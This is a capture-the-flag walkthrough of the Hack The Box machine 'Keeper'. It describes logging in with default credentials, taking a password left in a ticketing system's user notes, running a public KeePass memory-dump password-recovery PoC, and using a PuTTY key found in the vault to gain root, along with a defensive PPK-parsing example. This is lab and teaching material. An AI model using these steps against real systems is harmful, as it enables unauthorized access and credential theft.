Keeper | HTB Walkthrough
Connecting to VPN
Firstly, select the most suitable server (probably with the lowest ping) and download the VPN connection file from HTB. I personally use OpenVPN. For that, open the terminal and type the following commands:
cd Downloads/
sudo openvpn <address_for_the_.ovpn_file>
If OpenVPN is not installed, run the following command in the terminal:
sudo apt-get install openvpn
If executed properly, the above commands establish a VPN connection between your host machine and HTB's server. It usually takes a minute or two for the connection to come up.
Running an NMAP scan
Our first step is an nmap scan of the target IP (here 10.10.11.227), covering all TCP ports. Run the following command:
nmap -p- 10.10.11.227
nmap quickly reports that port 22 and port 80 are open. By default, port 22 is SSH and port 80 is a website served over HTTP.
Website Lookup
Now we look up the target IP address in the browser:

Here we can see the message "To raise an IT Support ticket, please visit tickets.keeper.htb/rt/". Clicking this hyperlink gives a page-not-found error. To fix this, we need to open our /etc/hosts file and map the hostname to the machine IP.
sudo nano /etc/hosts

As shown above, we need to add the machine's IP, following the already existing IP-Name Resolution format.
10.10.11.227 tickets.keeper.htb keeper.htb
Once done, we can now access the previous hyperlink. It leads us to a login page:

Looking for default credentials
We try some default credentials in the username and password boxes, such as admin/admin, admin/password, root/root and root/password.
The root/password pair works and leads us to the following page:

Navigating the User's Account
Navigating through the account, we see that under the Admin tab there are 2 users: lnorgaard and root.

Clicking on lnorgaard opens the following page:

Examining this page, we find an important credential exposed: in the 'Comments about this user' field, the initial password is recorded as "Welcome2023!".
Now we try SSH with the username "lnorgaard" and the password "Welcome2023!" found above.

We have successfully logged in and obtained a low-privileged user shell.
Running ls, we see the following listing:

We can see a zip file, RT30000.zip. Let's pull it back to our own box so we can start poking around with it. For that we start a Python HTTP server on the target with the following command:
python3 -m http.server

Making a separate directory to work with
Let's make a separate directory named 'workstation' for ease of use. Run the following commands in the terminal:
cd Desktop/
mkdir workstation
cd workstation/
Now, from the workstation directory, we download RT30000.zip from the Python server running on the target and unzip it. Run the following command:
wget http://10.10.11.227:8000/RT30000.zip

Unzipping RT30000.zip file
Unzipping the archive gives us the passcodes.kdbx file (alongside the KeePassDumpFull.dmp memory dump used below).

Now we check whether there is a PoC available for the KeePass vulnerability.
Head over to GitHub (vdohney/keepass-password-dumper), or clone the repo directly on your host machine:
git clone https://github.com/vdohney/keepass-password-dumper.git

Go into keepass-password-dumper/ and run the password dumper against the memory dump using dotnet:
cd keepass-password-dumper/
dotnet run ../KeePassDumpFull.dmp

At the end of the output we can see a recovered string that includes special characters. A Google search shows it is a popular Danish dish, 'rødgrød med fløde'.
Running kpcli
Let's run kpcli and try the word found above as the master password of the passcodes.kdbx file. Hopefully it works:

Running ls shows passcodes/; a further ls lists several entries. Trying these in turn, we find something under Network/.

When we run the show 0 -f command, we see the following output (-f reveals hidden password fields):

Let's try SSH with the username root and the password F4><3K0nd!

Unfortunately, it did not work.
Let's go back into kpcli and see if we find something in option 1.

Let's make a file named putty using the command sudo nano putty and paste in the output we got from the show 0 -f command. Then we remove the leading whitespace from every line using VS Code.
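As an added example (not part of the original walkthrough), the following Python does the whitespace cleanup by hand and also sanity-checks the result: it verifies the PPK header and the declared Public-Lines/Private-Lines counts and reports whether the private key is passphrase-protected, which is the property a defender auditing keys stored in a password manager cares about. The key material in SAMPLE_NOTES is a constructed placeholder, not the box's key.

```python
import re

# Constructed sample in PuTTY PPK v2 layout, indented the way kpcli prints a
# multi-line Notes field. The base64 lines are placeholders, not a real key.
SAMPLE_NOTES = """
    PuTTY-User-Key-File-2: ssh-rsa
    Encryption: none
    Comment: rsa-key-placeholder
    Public-Lines: 2
    AAAAB3NzaC1yc2EAAAADAQABAAABAQC0PLACEHOLDERPLACEHOLDERPLACEHOLDER
    PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDER==
    Private-Lines: 2
    AAABAQCPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLAC
    PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDER==
    Private-MAC: 0123456789abcdef0123456789abcdef01234567
"""

HEADER_RE = re.compile(r"^PuTTY-User-Key-File-(\d): (\S+)$")


def normalize_ppk(text: str) -> str:
    """Strip the indentation kpcli adds and drop blank lines, so the
    result can be saved verbatim as a .ppk file."""
    lines = [ln.strip() for ln in text.splitlines()]
    return "\n".join(ln for ln in lines if ln) + "\n"


def parse_ppk(text: str) -> dict:
    """Parse a normalized PPK, checking the declared line counts, and
    report whether the private half is protected by a passphrase."""
    lines = text.splitlines()
    m = HEADER_RE.match(lines[0]) if lines else None
    if not m:
        raise ValueError("not a PuTTY private key file")
    info = {"version": int(m.group(1)), "key_type": m.group(2)}
    i = 1
    while i < len(lines):
        key, sep, value = lines[i].partition(": ")
        if not sep:
            raise ValueError(f"malformed line {i + 1}: {lines[i]!r}")
        i += 1
        if key in ("Public-Lines", "Private-Lines"):
            count = int(value)
            block = lines[i:i + count]
            # A body line containing ': ' means the count overran into a field.
            if len(block) != count or any(": " in b for b in block):
                raise ValueError(f"{key} declares {count} lines; body is short")
            info[key] = "".join(block)
            i += count
        else:
            info[key] = value
    info["encrypted"] = info.get("Encryption", "none") != "none"
    return info


if __name__ == "__main__":
    parsed = parse_ppk(normalize_ppk(SAMPLE_NOTES))
    state = "passphrase-protected" if parsed["encrypted"] else "UNENCRYPTED"
    print(f"{parsed['key_type']} PPK v{parsed['version']}: {state}")
```

Writing the output of normalize_ppk to disk gives the file PuTTY expects; an "UNENCRYPTED" result means anyone who can read the password-manager entry can use the key directly.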



Save the file.
Open PuTTY and, under the SSH configuration, supply the putty key file we created above. After that we gain root access.

